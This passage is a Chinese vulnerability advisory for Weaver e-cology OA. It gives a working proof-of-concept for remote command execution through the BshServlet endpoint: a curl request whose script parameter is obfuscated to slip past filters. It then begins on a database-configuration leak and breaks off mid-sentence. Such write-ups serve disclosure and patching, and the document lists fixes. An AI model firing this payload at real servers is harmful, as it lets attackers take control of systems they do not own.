0x01 漏洞描述
泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。
0x02 漏洞危害
攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。
0x03 影响范围
泛微 e-cology<=9.0
0x04 漏洞复现
访问 http://url/weaver/bsh.servlet.BshServlet 输入 payload 如下:
0x05 poc
漏洞路径:/weaver/bsh.servlet.BshServlet
exec("whoami")
curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=ev
al%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'
0x06修复方案
1、屏蔽/weaver/*目录的访问;
2、https://www.weaver.com.cn/cs/securityDownload.asp
泛微OA系统在数据库配置信息泄露
0x01 漏洞描述
攻击者可通过该漏洞页面直接获取到数据库配置信息,攻击者可通过访问存在漏洞的页面并解密从而获取数据库配置信息,如攻击者可直接访问数据库,则可直接获取用户数据,由于泛微e-cology默认数据库大多为MSSQL数据库,结合XPCMDSHELL将可直接控制数据库服务器.
0x02 影响范围
目前已知为8.100.0531,不排除其他版本,包括不限于EC7.0、EC8.0、EC9.0版
0x03漏洞复现
对